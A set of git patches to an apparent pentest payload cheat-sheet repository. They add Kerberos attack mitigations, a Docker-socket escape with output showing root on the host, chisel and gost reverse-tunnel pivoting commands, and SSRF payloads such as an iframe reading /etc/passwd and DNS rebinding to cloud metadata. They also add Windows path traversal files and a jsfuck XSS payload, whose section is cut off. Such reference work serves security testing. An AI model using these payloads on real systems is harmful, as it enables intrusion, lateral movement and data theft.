index 0e206fa..ad4ff3c 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -715,6 +715,11 @@ root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi veloci
 Converting kirbi => ccache
 ```
 
+
+Mitigations:
+* Hard to detect because they are legit TGT tickets
+* Mimikatz generate a golden ticket with a life-span of 10 years
+
 ### Pass-the-Ticket Silver Tickets
 
 Forging a TGS require machine accound password (key) or NTLM hash from the KDC
@@ -734,6 +739,9 @@ root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache
 root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 
 ```
 
+Mitigations:
+* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket.
+
 ### Kerberoasting
 
 > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
@@ -772,7 +780,7 @@ Then crack the ticket with hashcat or john
 ```
 
 Mitigations: 
-* Have a very long password for your accounts with SPNs (> 25 characters)
+* Have a very long password for your accounts with SPNs (> 32 characters)
 * Make sure no users have SPNs
 
 ### KRB_AS_REP Roasting
@@ -834,6 +842,9 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4r
 root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 
 ```
 
+Mitigations: 
+* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
+
 ### Pass-the-Hash
 
 The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.
@@ -1595,6 +1606,7 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 6b3723410a3c5
 
 ## References
 
+* [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/)
 * [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](#https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
 * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
 * [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf)
@@ -1660,4 +1672,5 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 6b3723410a3c5
 * [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation)
 * [GPO Abuse - Part 1 - RastaMouse - 6 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-1/)
 * [GPO Abuse - Part 2 - RastaMouse - 13 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-2/)
-* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)
\ No newline at end of file
+* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)
+* [How To Attack Kerberos 101 - m0chan - July 31, 2019](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html)
\ No newline at end of file
diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md
index 26ca5d9..55b3cb3 100644
--- a/Methodology and Resources/Container - Docker Pentest.md	
+++ b/Methodology and Resources/Container - Docker Pentest.md	
@@ -33,6 +33,31 @@ curl -XPOST –unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Conte
 curl -XPOST –unix-socket /var/run/docker.sock http://localhost/containers/ID_FROM_PREVIOUS_COMMAND/start
 ```
 
+Exploit using [brompwnie/ed](https://github.com/brompwnie/ed)
+
+```powershell
+root@37bb034797d1:/tmp# ./ed_linux_amd64 -path=/var/run/ -autopwn=true        
+[+] Hunt dem Socks
+[+] Hunting Down UNIX Domain Sockets from: /var/run/
+[*] Valid Socket: /var/run/docker.sock
+[+] Attempting to autopwn
+[+] Hunting Docker Socks
+[+] Attempting to Autopwn:  /var/run/docker.sock
+[*] Getting Docker client...
+[*] Successfully got Docker client...
+[+] Attempting to escape to host...
+[+] Attempting in TTY Mode
+chroot /host && clear
+echo 'You are now on the underlying host'
+chroot /host && clear
+echo 'You are now on the underlying host'
+/ # chroot /host && clear
+/ # echo 'You are now on the underlying host'
+You are now on the underlying host
+/ # id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
+```
+
 
 ## Open Docker API Port
 
@@ -146,4 +171,5 @@ $ docker run --rm cve-2019-5736:malicious_image_POC
 - [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0)
 - [Breaking out of Docker via runC – Explaining CVE-2019-5736 - Yuval Avrahami - February 21, 2019](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)
 - [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host - dragonsector.pl](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html)
-- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md)
\ No newline at end of file
+- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md)
+- [Anatomy of a hack: Docker Registry - NotSoSecure - April 6, 2017](https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/)
\ No newline at end of file
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index 78958b0..cd4bc9e 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md	
+++ b/Methodology and Resources/Network Pivoting Techniques.md	
@@ -12,6 +12,8 @@
 * [Metasploit](#metasploit)
 * [sshuttle](#sshuttle)
 * [chisel](#chisel)
+  * [SharpChisel](#sharpchisel)
+* [gost](#gost)
 * [Rpivot](#rpivot)
 * [RevSocks](#revsocks)
 * [plink](#plink)
@@ -170,6 +172,40 @@ user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:
 user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
 ```
 
+### SharpChisel
+
+A C# Wrapper of Chisel : https://github.com/shantanu561993/SharpChisel
+
+```powershell
+user@hacker$ ./chisel server -p 8080 --key "private" --auth "user:pass" --reverse --proxy "https://www.google.com"
+================================================================
+server : run the Server Component of chisel 
+-p 8080 : run server on port 8080
+--key "private": use "private" string to seed the generation of a ECDSA public and private key pair
+--auth "user:pass" : Creds required to connect to the server
+--reverse:  Allow clients to specify reverse port forwarding remotes in addition to normal remotes.
+--proxy https://www.google.com : Specifies another HTTP server to proxy requests to when chisel receives a normal HTTP request. Useful for hiding chisel in plain sight.
+
+user@victim$ SharpChisel.exe client --auth user:pass https://redacted.cloudfront.net R:1080:socks
+```
+
+## Gost
+
+> Wiki English : https://docs.ginuerzh.xyz/gost/en/
+
+```powershell
+git clone https://github.com/ginuerzh/gost
+cd gost/cmd/gost
+go build
+
+# Socks5 Proxy
+Server side: gost -L=socks5://:1080
+Client side: gost -L=:8080 -F=socks5://server_ip:1080?notls=true
+
+# Local Port Forward
+gost -L=tcp://:2222/192.168.1.1:22 [-F=..]
+```
+
 ## Rpivot
 
 Server (Attacker box)
@@ -305,4 +341,5 @@ unzip ngrok-stable-linux-amd64.zip
 * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences)
 * [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
 * [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
-* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
\ No newline at end of file
+* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
+* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
\ No newline at end of file
diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index 38318b2..19ba16e 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -33,6 +33,7 @@
 * [SSRF exploiting WSGI](#ssrf-exploiting-wsgi)
 * [SSRF exploiting Redis](#ssrf-exploiting-redis)
 * [SSRF to XSS](#ssrf-to-xss)
+* [SSRF from XSS](#ssrf-from-xss)
 * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
   * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
   * [SSRF URL for AWS ECS](#ssrf-url-for-aws-ecs)
@@ -426,6 +427,25 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple
 https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
 ```
 
+## SSRF from XSS
+
+### Using an iframe
+
+The content of the file will be integrated inside the PDF as an image or text.
+
+```html
+<img src="echopwn" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
+```
+
+### Using an attachment
+
+Example of a PDF attachment using HTML 
+
+1. use `<link rel=attachment href="URL">` as Bio text
+2. use 'Download Data' feature to get PDF
+3. use `pdfdetach -saveall filename.pdf` to extract embedded resource
+4. `cat attachment.bin`
+
 ## SSRF URL for Cloud Instances
 
 ### SSRF URL for AWS Bucket

From 6d37ad9e2e8c9b7d84ffcbacb31ae88b59f70432 Mon Sep 17 00:00:00 2001
From: Alex Lauerman <alex.lauerman@gmail.com>
Date: Sun, 21 Jun 2020 16:19:15 -0500
Subject: [PATCH 73/85] Improved Clarity of ssrf redirect

---
 Server Side Request Forgery/README.md | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index 19ba16e..161e267 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -79,11 +79,11 @@ http://localhost:443
 http://localhost:22
 ```
 
-Advanced exploit [using a redirection](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)
+Advanced exploit [using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)
 
 ```powershell
-1. Create a subdomain pointing to 192.168.0.1 with DNS A record  e.g:ssrf.example.com
-2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP
+1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)
+2. Launch the SSRF pointing to  vulnerable.com/index.php?url=http://YOUR_SERVER_IP
 vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
 ```
 

From c39c904c9a6ff204f326072fb406eb0220563c66 Mon Sep 17 00:00:00 2001
From: Alex Lauerman <alex.lauerman@gmail.com>
Date: Sun, 21 Jun 2020 16:27:32 -0500
Subject: [PATCH 74/85] Moved bypasses under the bypasses section

---
 Server Side Request Forgery/README.md | 32 +++++++++++++--------------
 1 file changed, 16 insertions(+), 16 deletions(-)

diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index 161e267..d130656 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -79,22 +79,6 @@ http://localhost:443
 http://localhost:22
 ```
 
-Advanced exploit [using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)
-
-```powershell
-1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)
-2. Launch the SSRF pointing to  vulnerable.com/index.php?url=http://YOUR_SERVER_IP
-vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
-```
-
-Advanced exploit using type=url
-
-```powershell
-Change "type=file" to "type=url"
-Paste URL in text field and hit enter
-Using this vulnerability users can upload images from any image URL = trigger an SSRF
-```
-
 ## Bypassing filters
 
 ### Bypass using HTTPS
@@ -237,6 +221,22 @@ http://127.1.1.1:80#\@127.2.2.2:80/
 
 ![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true)
 
+### Bypassing using other tricks
+[using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)
+
+```powershell
+1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)
+2. Launch the SSRF pointing to  vulnerable.com/index.php?url=http://YOUR_SERVER_IP
+vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
+```
+
+Using type=url
+
+```powershell
+Change "type=file" to "type=url"
+Paste URL in text field and hit enter
+Using this vulnerability users can upload images from any image URL = trigger an SSRF
+```
 
 ## SSRF exploitation via URL Scheme
 

From d5c1f39c0f61702bca90297929e26bc9b90318d8 Mon Sep 17 00:00:00 2001
From: Alex Lauerman <alex.lauerman@gmail.com>
Date: Sun, 21 Jun 2020 16:31:16 -0500
Subject: [PATCH 75/85] Added DNS Rebinding

---
 Server Side Request Forgery/README.md | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)

diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index d130656..0b889ec 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -221,7 +221,7 @@ http://127.1.1.1:80#\@127.2.2.2:80/
 
 ![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true)
 
-### Bypassing using other tricks
+### Bypassing using a redirect
 [using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)
 
 ```powershell
@@ -230,7 +230,7 @@ http://127.1.1.1:80#\@127.2.2.2:80/
 vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
 ```
 
-Using type=url
+### Bypassing using type=url
 
 ```powershell
 Change "type=file" to "type=url"
@@ -238,6 +238,14 @@ Paste URL in text field and hit enter
 Using this vulnerability users can upload images from any image URL = trigger an SSRF
 ```
 
+### Bypassing using DNS Rebinding (TOCTOU)
+
+```powershell
+Create a domain that change between two IPs. http://1u.ms/ exists for this purpose.
+For example to rotate between 1.2.3.4 and 169.254-169.254, use the following domain:
+make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
+```
+
 ## SSRF exploitation via URL Scheme
 
 ### File 

From 7aef550c39a10db8ea7c5408e887d100ec0972ae Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Mon, 22 Jun 2020 15:53:07 +0200
Subject: [PATCH 76/85] XXE ref. refactor

- Add new refs
- Format title with date, author, etc.
- Remove dead hosts:
  - agrawalsmart7.com
  - esoln.net
---
 XXE Injection/README.md | 28 ++++++++++++++--------------
 1 file changed, 14 insertions(+), 14 deletions(-)

diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index b12c8c7..2c3623c 100644
--- a/XXE Injection/README.md	
+++ b/XXE Injection/README.md	
@@ -511,22 +511,22 @@ updating: xl/sharedStrings.xml (deflated 17%)
 ## References
 
 * [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
-* [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
-* [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
-* [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
+* [Detecting and exploiting XXE in SAML Interfaces](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) - 6. Nov. 2014 - Von Christian Mainka
+* [[Gist] staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
+* [[Gist] mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
 * [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 - Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
 * [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm)
-* [Understanding Xxe From Basic To Blind - 10/11/2018 - Utkarsh Agrawal](http://agrawalsmart7.com/2018/11/10/Understanding-XXE-from-Basic-to-Blind.html)
 * [From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/)
-* [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) by  detectify
-* [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) by Raghav Bisht
-* [XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf)
-* [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html)
-* [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/)
-* [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
+* [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) April 11, 2014 by  detectify
+* [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) August 05, 2016 by Raghav Bisht
+* [OOB XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) by Sean	Melia @seanmeals
+* [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) 01/2017
+* [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) JUNE 22, 2016 by YEO QUAN YANG
 * [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html)
-* [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
+* [Exploiting XXE with local DTD files](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) - 12/12/2018 - Arseniy Sharoglazov
 * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
-- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation)
-- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
-- [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube)
+* [Automating local DTD discovery for XXE exploitation](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - July 16 2019 by Philippe Arteau
+* [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
+* [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube)
+* [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon
+* [SynAcktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Juien SZLAMOWICZ, Sebastien DUDEK

From e37aff2fcd64748bdf1b8b213e7d98898f5a3734 Mon Sep 17 00:00:00 2001
From: clem9669 <18504086+clem9669@users.noreply.github.com>
Date: Tue, 23 Jun 2020 14:26:46 +0000
Subject: [PATCH 77/85] Add useful always existing windows file

Adding always existing file in recent Windows machine. Ideal to test path traversal but nothing much interesting inside
---
 Directory Traversal/README.md | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md
index ec975de..3993305 100644
--- a/Directory Traversal/README.md	
+++ b/Directory Traversal/README.md	
@@ -123,6 +123,14 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software
 
 ### Interesting Windows files
 
+Always existing file in recent Windows machine. 
+Ideal to test path traversal but nothing much interesting inside...
+
+```powershell
+c:\windows\system32\license.rtf
+c:\windows\system32\eula.txt
+```
+
 Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
 
 ```powershell
@@ -167,5 +175,6 @@ The following log files are controllable and can be included with an evil payloa
 
 ## References
 
+* [Path Traversal Cheat Sheet: Windows](https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/)
 * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
 * [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)

From 93a372cea42180dcc820ec56ff0fdc6c3fab3213 Mon Sep 17 00:00:00 2001
From: looCiprian <lorenz.grazian@gmail.com>
Date: Tue, 23 Jun 2020 18:34:02 +0200
Subject: [PATCH 78/85] Add jsfuck bypassing method to xss cheat sheet

---
 XSS Injection/README.md | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index ecb5a4d..9cdfe91 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -53,6 +53,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
   - [Bypass using UTF-32](#bypass-using-utf---32)
   - [Bypass using BOM](#bypass-using-bom)
   - [Bypass using weird encoding or native interpretation](#bypass-using-weird-encoding-or-native-interpretation)
+  - [Bypass using jsfuck](#bypass-using-jsfuck)
 - [CSP Bypass](#csp-bypass)
 - [Common WAF Bypass](#common-waf-bypass)
 
@@ -934,6 +935,14 @@ XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o
 <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
 ```
 
+### Bypass using jsfuck
+
+Bypass using [jsfuck](http://www.jsfuck.com/)
+
+```javascript
